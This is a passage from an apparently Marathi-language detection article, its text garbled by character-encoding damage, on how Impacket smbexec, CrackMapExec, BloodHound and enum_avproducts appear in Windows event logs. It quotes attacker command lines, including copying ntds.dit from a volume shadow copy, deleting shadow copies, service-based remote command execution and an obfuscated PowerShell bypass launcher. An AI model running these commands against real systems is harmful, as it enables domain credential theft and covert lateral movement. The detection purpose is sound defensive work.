4. 4688 - vssadmin рд▓рд╛рдБрдЪ рдХрд░рдгрд╛рд░реА cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдпрд╛рд░ рдХрд░рдгреЗ:

тАЬC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - рдХрдорд╛рдВрдбрд╕рд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдпрд╛рд░ рдХрд░рдгреЗ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - рдХрдорд╛рдВрдбрд╕рд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдпрд╛рд░ рдХрд░рдгреЗ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - рдХрдорд╛рдВрдбрд╕рд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдпрд╛рд░ рдХрд░рдгреЗ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

рдЕрдиреЗрдХ рдкреЛрд╕реНрдЯ-рд╢реЛрд╖рдг рд╕рд╛рдзрдирд╛рдВрдкреНрд░рдорд╛рдгреЗ, рдЗрдореНрдкреЕрдХреЗрдЯрдордзреНрдпреЗ рджреВрд░рд╕реНрдердкрдгреЗ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдореЙрдбреНрдпреВрд▓ рдЖрд╣реЗрдд. рдЖрдореНрд╣реА smbexec рд╡рд░ рд▓рдХреНрд╖ рдХреЗрдВрджреНрд░рд┐рдд рдХрд░реВ, рдЬреЗ рд░рд┐рдореЛрдЯ рдорд╢реАрдирд╡рд░ рдкрд░рд╕реНрдкрд░ рдХрдорд╛рдВрдб рд╢реЗрд▓ рдкреНрд░рджрд╛рди рдХрд░рддреЗ. рдпрд╛ рдореЙрдбреНрдпреВрд▓рд▓рд╛ рдкрд╛рд╕рд╡рд░реНрдб рдХрд┐рдВрд╡рд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реЕрд╢рд╕рд╣ SMB рджреНрд╡рд╛рд░реЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рджреЗрдЦреАрд▓ рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ. рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ. рдЖрдХреГрддреА 3 рдордзреНрдпреЗ рдЖрдореНрд╣реА рдЕрд╕реЗ рд╕рд╛рдзрди рдХрд╕реЗ рдХрд╛рд░реНрдп рдХрд░рддреЗ рдпрд╛рдЪреЗ рдЙрджрд╛рд╣рд░рдг рдкрд╛рд╣рддреЛ, рдпрд╛ рдкреНрд░рдХрд░рдгрд╛рдд рддреЗ рд╕реНрдерд╛рдирд┐рдХ рдкреНрд░рд╢рд╛рд╕рдХ рдХрдиреНрд╕реЛрд▓ рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 3. рдкрд░рд╕реНрдкрд░рд╕рдВрд╡рд╛рджреА smbexec рдХрдиреНрд╕реЛрд▓

рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рдирдВрддрд░ smbexec рдЪреА рдкрд╣рд┐рд▓реА рдкрд╛рдпрд░реА рдореНрд╣рдгрдЬреЗ OpenSCManagerW рдХрдорд╛рдВрдб (15) рд╕рд╣ SCM рдЙрдШрдбрдгреЗ. рдХреНрд╡реЗрд░реА рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдЖрд╣реЗ: рдорд╢реАрдирдирд╛рд╡ рдлреАрд▓реНрдб рдбрдореА рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 4. рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрдШрдбрдгреНрдпрд╛рдЪреА рд╡рд┐рдирдВрддреА

рдкреБрдвреЗ, CreateServiceW рдХрдорд╛рдВрдб (12) рд╡рд╛рдкрд░реВрди рд╕реЗрд╡рд╛ рддрдпрд╛рд░ рдХреЗрд▓реА рдЬрд╛рддреЗ. smbexec рдЪреНрдпрд╛ рдмрд╛рдмрддреАрдд, рдЖрдкрдг рдкреНрд░рддреНрдпреЗрдХ рд╡реЗрд│реА рд╕рдорд╛рди рдХрдорд╛рдВрдб рдХрдиреНрд╕реНрдЯреНрд░рдХреНрд╢рди рд▓реЙрдЬрд┐рдХ рдкрд╛рд╣реВ рд╢рдХрддреЛ. рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ. 5 рд╣рд┐рд░рд╡рд╛ рди рдмрджрд▓рддрд╛ рдпреЗрдгрд╛рд░рд╛ рдХрдорд╛рдВрдб рдкреЕрд░рд╛рдореАрдЯрд░реНрд╕ рджрд░реНрд╢рд╡рддреЛ, рдкрд┐рд╡рд│рд╛ рджрд░реНрд╢рд╡рддреЛ рдХреА рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рдХрд╛рдп рдмрджрд▓реВ рд╢рдХрддреЛ. рд╣реЗ рдкрд╛рд╣рдгреЗ рд╕реЛрдкреЗ рдЖрд╣реЗ рдХреА рдПрдХреНрдЭрд┐рдХреНрдпреБрдЯреЗрдмрд▓ рдлрд╛рдЗрд▓рдЪреЗ рдирд╛рд╡, рддрд┐рдЪреА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЖрдгрд┐ рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓ рдмрджрд▓рд▓реА рдЬрд╛рдК рд╢рдХрддреЗ, рдкрд░рдВрддреБ рдЗрдореНрдкреЕрдХреЗрдЯ рдореЙрдбреНрдпреВрд▓рдЪреНрдпрд╛ рддрд░реНрдХрд╛рд▓рд╛ рддреНрд░рд╛рд╕ рди рджреЗрддрд╛ рдЙрд░реНрд╡рд░рд┐рдд рдмрджрд▓рдгреЗ рдЕрдзрд┐рдХ рдХрдареАрдг рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 5. рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╡рд╛рдкрд░реВрди рд╕реЗрд╡рд╛ рддрдпрд╛рд░ рдХрд░рдгреНрдпрд╛рдЪреА рд╡рд┐рдирдВрддреА

Smbexec рд╡рд┐рдВрдбреЛрдЬ рдЗрд╡реНрд╣реЗрдВрдЯ рд▓реЙрдЧрдордзреНрдпреЗ рд╕реНрдкрд╖реНрдЯ рдЯреНрд░реЗрд╕ рджреЗрдЦреАрд▓ рд╕реЛрдбрддреЗ. ipconfig рдХрдорд╛рдВрдбрд╕рд╣ рдЗрдВрдЯрд░рдПрдХреНрдЯрд┐рд╡реНрд╣ рдХрдорд╛рдВрдб рд╢реЗрд▓рд╕рд╛рдареА Windows Server 2016 рд▓реЙрдЧрдордзреНрдпреЗ, рдЖрдореНрд╣рд╛рд▓рд╛ рдЗрд╡реНрд╣реЗрдВрдЯрдЪрд╛ рдЦрд╛рд▓реАрд▓ рдореБрдЦреНрдп рдХреНрд░рдо рджрд┐рд╕реЗрд▓:

1. 4697 - рдкреАрдбрд┐рддреЗрдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рд╕реЗрд╡реЗрдЪреА рд╕реНрдерд╛рдкрдирд╛:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - рдмрд┐рдВрджреВ 1 рдкрд╛рд╕реВрди рдпреБрдХреНрддрд┐рд╡рд╛рджрд╛рдВрд╕рд╣ cmd.exe рдкреНрд░рдХреНрд░рд┐рдпреЗрдЪреА рдирд┐рд░реНрдорд┐рддреА.
3. 5145 - C$ рдирд┐рд░реНрджреЗрд╢рд┐рдХреЗрддреАрд▓ __рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓рдЪреЗ рдкреНрд░рд╡реЗрд╢ рдЕрдзрд┐рдХрд╛рд░ рддрдкрд╛рд╕рдд рдЖрд╣реЗ.
4. 4697 - рдкреАрдбрд┐рддреЗрдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рд╕реЗрд╡реЗрдЪреА рд╕реНрдерд╛рдкрдирд╛.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - рдмрд┐рдВрджреВ 4 рдкрд╛рд╕реВрди рдпреБрдХреНрддрд┐рд╡рд╛рджрд╛рдВрд╕рд╣ cmd.exe рдкреНрд░рдХреНрд░рд┐рдпреЗрдЪреА рдирд┐рд░реНрдорд┐рддреА.
6. 5145 - C$ рдирд┐рд░реНрджреЗрд╢рд┐рдХреЗрддреАрд▓ __рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓рдЪреЗ рдкреНрд░рд╡реЗрд╢ рдЕрдзрд┐рдХрд╛рд░ рддрдкрд╛рд╕рдд рдЖрд╣реЗ.

рдЖрдХреНрд░рдордг рд╕рд╛рдзрдирд╛рдВрдЪреНрдпрд╛ рд╡рд┐рдХрд╛рд╕рд╛рд╕рд╛рдареА рдЗрдореНрдкреЕрдХреЗрдЯ рд╣рд╛ рдЖрдзрд╛рд░ рдЖрд╣реЗ. рд╣реЗ рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рдордзреАрд▓ рдЬрд╡рд│рдЬрд╡рд│ рд╕рд░реНрд╡ рдкреНрд░реЛрдЯреЛрдХреЙрд▓рдЪреЗ рд╕рдорд░реНрдерди рдХрд░рддреЗ рдЖрдгрд┐ рддреНрдпрд╛рдЪ рд╡реЗрд│реА рддреНрдпрд╛рдЪреА рд╕реНрд╡рддрдГрдЪреА рд╡реИрд╢рд┐рд╖реНрдЯреНрдпрдкреВрд░реНрдг рд╡реИрд╢рд┐рд╖реНрдЯреНрдпреЗ рдЖрд╣реЗрдд. рдпреЗрдереЗ рд╡рд┐рд╢рд┐рд╖реНрдЯ winreg рд╡рд┐рдирдВрддреНрдпрд╛ рдЖрд╣реЗрдд, рдЖрдгрд┐ рд╡реИрд╢рд┐рд╖реНрдЯреНрдпрдкреВрд░реНрдг рдХрдорд╛рдВрдб рдлреЙрд░реНрдореЗрд╢рдирд╕рд╣ SCM API рдЪрд╛ рд╡рд╛рдкрд░, рдЖрдгрд┐ рдлрд╛рдЗрд▓ рдирд╛рд╡ рд╕реНрд╡рд░реВрдк, рдЖрдгрд┐ SMB рд╢реЗрдЕрд░ SYSTEM32.

CRACKMAPEXEC

CME рдЯреВрд▓рдЪреА рд░рдЪрдирд╛ рдкреНрд░рд╛рдореБрдЦреНрдпрд╛рдиреЗ рддреНрдпрд╛ рдиреЗрд╣рдореАрдЪреНрдпрд╛ рдХреНрд░рд┐рдпрд╛ рд╕реНрд╡рдпрдВрдЪрд▓рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдХреЗрд▓реА рдЬрд╛рддреЗ рдЬреНрдпрд╛ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рд▓рд╛ рдиреЗрдЯрд╡рд░реНрдХрдордзреНрдпреЗ рдкреБрдвреЗ рдЬрд╛рдгреНрдпрд╛рд╕рд╛рдареА рдХрд░рд╛рд╡реНрдпрд╛ рд▓рд╛рдЧрддрд╛рдд. рд╣реЗ рддреБрдореНрд╣рд╛рд▓рд╛ рд╕реБрдкреНрд░рд╕рд┐рджреНрдз рдПрдореНрдкрд╛рдпрд░ рдПрдЬрдВрдЯ рдЖрдгрд┐ рдореАрдЯрд░рдкреНрд░реАрдЯрд░ рдпрд╛рдВрдЪреНрдпрд╛ рд╕рдВрдпреЛрдЧрд╛рдиреЗ рдХрд╛рдо рдХрд░рдгреНрдпрд╛рдЪреА рдкрд░рд╡рд╛рдирдЧреА рджреЗрддреЗ. рдЧреБрдкреНрддрдкрдгреЗ рдЖрдЬреНрдЮрд╛ рдЕрдВрдорд▓рд╛рдд рдЖрдгрдгреНрдпрд╛рд╕рд╛рдареА, CME рддреНрдпрд╛рдВрдирд╛ рдЕрд╕реНрдкрд╖реНрдЯ рдХрд░реВ рд╢рдХрддреЗ. рдмреНрд▓рдбрд╣рд╛рдКрдВрдб (рдПрдХ рд╡реЗрдЧрд│реЗ рдЯреЛрдкрдг рд╕рд╛рдзрди) рд╡рд╛рдкрд░реВрди, рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рд╕рдХреНрд░рд┐рдп рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рд╕рддреНрд░рд╛рдЪрд╛ рд╢реЛрдз рд╕реНрд╡рдпрдВрдЪрд▓рд┐рдд рдХрд░реВ рд╢рдХрддреЛ.

рдЧреБрдкреНрдд рдкреЛрд▓рд┐рд╕

рдмреНрд▓рдбрд╣рд╛рдКрдВрдб, рдПрдХ рд╕реНрд╡рддрдВрддреНрд░ рд╕рд╛рдзрди рдореНрд╣рдгреВрди, рдиреЗрдЯрд╡рд░реНрдХрдордзреНрдпреЗ рдкреНрд░рдЧрдд рдЯреЛрдкрдгрдирд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЗ. рд╣реЗ рд╡рд╛рдкрд░рдХрд░реНрддреЗ, рдорд╢реАрди, рдЧрдЯ, рд╕рддреНрд░рд╛рдВрдмрджреНрджрд▓ рдбреЗрдЯрд╛ рд╕рдВрдХрд▓рд┐рдд рдХрд░рддреЗ рдЖрдгрд┐ рдкреЙрд╡рд░рд╢реЗрд▓ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдВрд╡рд╛ рдмрд╛рдпрдирд░реА рдлрд╛рдЗрд▓ рдореНрд╣рдгреВрди рдкреБрд░рд╡рд▓реЗ рдЬрд╛рддреЗ. рдорд╛рд╣рд┐рддреА рдЧреЛрд│рд╛ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА LDAP рдХрд┐рдВрд╡рд╛ SMB-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рд╡рд╛рдкрд░рд▓реЗ рдЬрд╛рддрд╛рдд. CME рдЗрдВрдЯрд┐рдЧреНрд░реЗрд╢рди рдореЙрдбреНрдпреБрд▓ рдмреНрд▓рдбрд╣рд╛рдКрдВрдбрд▓рд╛ рдкреАрдбрд┐рддреЗрдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдгреНрдпрд╛рдЪреА, рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХреЗрд▓реНрдпрд╛рдирдВрддрд░ рдЧреЛрд│рд╛ рдХреЗрд▓реЗрд▓рд╛ рдбреЗрдЯрд╛ рдЪрд╛рд▓рд╡рдгреНрдпрд╛рд╕ рдЖрдгрд┐ рдкреНрд░рд╛рдкреНрдд рдХрд░рдгреНрдпрд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЗ, рдЬреНрдпрд╛рдореБрд│реЗ рд╕рд┐рд╕реНрдЯрдордордзреАрд▓ рдХреНрд░рд┐рдпрд╛ рд╕реНрд╡рдпрдВрдЪрд▓рд┐рдд рд╣реЛрддрд╛рдд рдЖрдгрд┐ рддреНрдпрд╛рдВрдирд╛ рдХрдореА рд▓рдХреНрд╖рд╛рдд рдпреЗрдгреНрдпрд╛рд╕рд╛рд░рдЦреЗ рдмрдирддреЗ. рдмреНрд▓рдбрд╣рд╛рдКрдВрдб рдЧреНрд░рд╛рдлрд┐рдХрд▓ рд╢реЗрд▓ рдЧреЛрд│рд╛ рдХреЗрд▓реЗрд▓рд╛ рдбреЗрдЯрд╛ рдЖрд▓реЗрдЦрд╛рдВрдЪреНрдпрд╛ рд╕реНрд╡рд░реВрдкрд╛рдд рд╕рд╛рджрд░ рдХрд░рддреЛ, рдЬреЛ рддреБрдореНрд╣рд╛рд▓рд╛ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдЪреНрдпрд╛ рдорд╢реАрдирдкрд╛рд╕реВрди рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХрд╛рдкрд░реНрдпрдВрддрдЪрд╛ рд╕рд░реНрд╡рд╛рдд рд▓рд╣рд╛рди рдорд╛рд░реНрдЧ рд╢реЛрдзрдгреНрдпрд╛рдЪреА рдкрд░рд╡рд╛рдирдЧреА рджреЗрддреЛ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 6. рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдЗрдВрдЯрд░рдлреЗрд╕

рдкреАрдбрд┐рддрд╛рдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рдЪрд╛рд▓рдгреНрдпрд╛рд╕рд╛рдареА, рдореЙрдбреНрдпреВрд▓ ATSVC рдЖрдгрд┐ SMB рд╡рд╛рдкрд░реВрди рдХрд╛рд░реНрдп рддрдпрд╛рд░ рдХрд░рддреЗ. ATSVC рд╣реЗ рд╡рд┐рдВрдбреЛрдЬ рдЯрд╛рд╕реНрдХ рд╢реЗрдбреНрдпреБрд▓рд░рд╕рд╣ рдХрд╛рдо рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдПрдХ рдЗрдВрдЯрд░рдлреЗрд╕ рдЖрд╣реЗ. рдиреЗрдЯрд╡рд░реНрдХрд╡рд░ рдХрд╛рд░реНрдпреЗ рддрдпрд╛рд░ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА CME рддреНрдпрд╛рдЪреЗ NetrJobAdd(1) рдлрдВрдХреНрд╢рди рд╡рд╛рдкрд░рддреЗ. CME рдореЙрдбреНрдпреВрд▓ рдХрд╛рдп рдкрд╛рдард╡рддреЗ рдпрд╛рдЪреЗ рдЙрджрд╛рд╣рд░рдг рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ рджрд╛рдЦрд╡рд▓реЗ рдЖрд╣реЗ. 7: рд╣рд╛ cmd.exe рдХрдорд╛рдВрдб рдХреЙрд▓ рдЖрд╣реЗ рдЖрдгрд┐ XML рдлреЙрд░рдореЕрдЯрдордзреНрдпреЗ рд╡рд┐рддрд░реНрдХрд╛рдВрдЪреНрдпрд╛ рд╕реНрд╡рд░реВрдкрд╛рдд рдЕрд╕реНрдкрд╖реНрдЯ рдХреЛрдб рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рдЕрдВрдЬреАрд░.7. CME рджреНрд╡рд╛рд░реЗ рдХрд╛рд░реНрдп рддрдпрд╛рд░ рдХрд░рдгреЗ

рдХрд╛рд░реНрдп рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреАрд╕рд╛рдареА рд╕рдмрдорд┐рдЯ рдХреЗрд▓реНрдпрд╛рдирдВрддрд░, рдкреАрдбрд┐рддреЗрдЪреЗ рдорд╢реАрди рд╕реНрд╡рддрдГрдЪ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рд╕реБрд░реВ рдХрд░рддреЗ рдЖрдгрд┐ рд╣реЗ рд░рд╣рджрд╛рд░реАрдордзреНрдпреЗ рдкрд╛рд╣рд┐рд▓реЗ рдЬрд╛рдК рд╢рдХрддреЗ. рдорд╛рдирдХ рдЧрдЯ, рдбреЛрдореЗрдирдордзреАрд▓ рд╕рд░реНрд╡ рдорд╢реАрдиреНрд╕ рдЖрдгрд┐ рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдВрдЪреА рд╕реВрдЪреА рдЖрдгрд┐ SRVSVC NetSessEnum рд╡рд┐рдирдВрддреАрджреНрд╡рд╛рд░реЗ рд╕рдХреНрд░рд┐рдп рд╡рд╛рдкрд░рдХрд░реНрддрд╛ рд╕рддреНрд░рд╛рдВрдмрджреНрджрд▓ рдорд╛рд╣рд┐рддреА рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА LDAP рдХреНрд╡реЗрд░реАрджреНрд╡рд╛рд░реЗ рдореЙрдбреНрдпреВрд▓рдЪреЗ рд╡реИрд╢рд┐рд╖реНрдЯреНрдп рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 8. SMB рджреНрд╡рд╛рд░реЗ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░рд╛рдВрдЪреА рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдгреЗ

рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рдСрдбрд┐рдЯрд┐рдВрдЧ рд╕рдХреНрд╖рдо рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рдкреАрдбрд┐рддрд╛рдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рдмреНрд▓рдбрд╣рд╛рдКрдВрдб рд▓рд╛рдБрдЪ рдХрд░рдгреЗ ID 4688 (рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд┐рд░реНрдорд┐рддреА) рдЖрдгрд┐ рдкреНрд░рдХреНрд░рд┐рдпреЗрдЪреЗ рдирд╛рд╡ рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рдЗрд╡реНрд╣реЗрдВрдЯрд╕рд╣ рдЖрд╣реЗ. ┬лC:WindowsSystem32cmd.exe┬╗. рддреНрдпрд╛рдмрджреНрджрд▓ рдХрд╛рдп рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдЖрд╣реЗ рддреЗ рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рд╡рд┐рддрд░реНрдХ рдЖрд╣реЗрдд:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , тАж , 40,41 )-jOIN'' ) "

Enum_avрдЙрддреНрдкрд╛рджрдиреЗ

enum_avproducts рдореЙрдбреНрдпреВрд▓ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдЖрдгрд┐ рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреАрдЪреНрдпрд╛ рджреГрд╖реНрдЯрд┐рдХреЛрдирд╛рддреВрди рдЦреВрдк рдордиреЛрд░рдВрдЬрдХ рдЖрд╣реЗ. WMI рддреБрдореНрд╣рд╛рд▓рд╛ рд╡рд┐рд╡рд┐рдз Windows рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕рдордзреВрди рдбреЗрдЯрд╛ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА WQL рдХреНрд╡реЗрд░реА рднрд╛рд╖рд╛ рд╡рд╛рдкрд░рдгреНрдпрд╛рдЪреА рдкрд░рд╡рд╛рдирдЧреА рджреЗрддреЗ, рдЬреЗ рдореВрд▓рдд: рд╣реЗ CME рдореЙрдбреНрдпреВрд▓ рд╡рд╛рдкрд░рддреЗ. рддреЗ AntiSpywareProduct рдЖрдгрд┐ AntiMirusProduct рд╡рд░реНрдЧрд╛рдВрдирд╛ рдкреАрдбрд┐рддрд╛рдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рд╕реНрдерд╛рдкрд┐рдд рдХреЗрд▓реЗрд▓реНрдпрд╛ рд╕рдВрд░рдХреНрд╖рдг рд╕рд╛рдзрдирд╛рдВрдмрджреНрджрд▓ рдкреНрд░рд╢реНрди рдирд┐рд░реНрдорд╛рдг рдХрд░рддреЗ. рдЖрд╡рд╢реНрдпрдХ рдбреЗрдЯрд╛ рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА, рдореЙрдбреНрдпреВрд▓ rootSecurityCenter2 рдиреЗрдорд╕реНрдкреЗрд╕рд╢реА рдХрдиреЗрдХреНрдЯ рд╣реЛрддреЗ, рдирдВрддрд░ WQL рдХреНрд╡реЗрд░реА рддрдпрд╛рд░ рдХрд░рддреЗ рдЖрдгрд┐ рдкреНрд░рддрд┐рд╕рд╛рдж рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ. рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ. рдЖрдХреГрддреА 9 рдЕрд╢рд╛ рд╡рд┐рдирдВрддреНрдпрд╛ рдЖрдгрд┐ рдкреНрд░рддрд┐рд╕рд╛рджрд╛рдВрдЪреА рд╕рд╛рдордЧреНрд░реА рджрд░реНрд╢рд╡рддреЗ. рдЖрдордЪреНрдпрд╛ рдЙрджрд╛рд╣рд░рдгрд╛рдд, рд╡рд┐рдВрдбреЛрдЬ рдбрд┐рдлреЗрдВрдбрд░ рдЖрдврд│рд▓реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 9. enum_avproducts рдореЙрдбреНрдпреВрд▓рдЪреА рдиреЗрдЯрд╡рд░реНрдХ рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк

рдмрд░реНтАНрдпрд╛рдЪрджрд╛, WMI рдСрдбрд┐рдЯрд┐рдВрдЧ (рдЯреНрд░реЗрд╕ WMI-рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк), рдЬреНрдпрд╛рдЪреНрдпрд╛ рдЗрд╡реНрд╣реЗрдВрдЯрдордзреНрдпреЗ рддреБрдореНрд╣рд╛рд▓рд╛ WQL рдХреНрд╡реЗрд░реАрдмрджреНрджрд▓ рдЙрдкрдпреБрдХреНрдд рдорд╛рд╣рд┐рддреА рдорд┐рд│реВ рд╢рдХрддреЗ, рддреА рдЕрдХреНрд╖рдо рдХреЗрд▓реА рдЬрд╛рдК рд╢рдХрддреЗ. рдкрд░рдВрддреБ рдЬрд░ рддреЗ рд╕рдХреНрд╖рдо рдХреЗрд▓реЗ рдЕрд╕реЗрд▓, рддрд░ enum_avproducts рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд╛рд▓рд╡рд▓реНрдпрд╛рд╕, ID 11 рд╕рд╣ рдПрдХ рдЗрд╡реНрд╣реЗрдВрдЯ рдЬрддрди 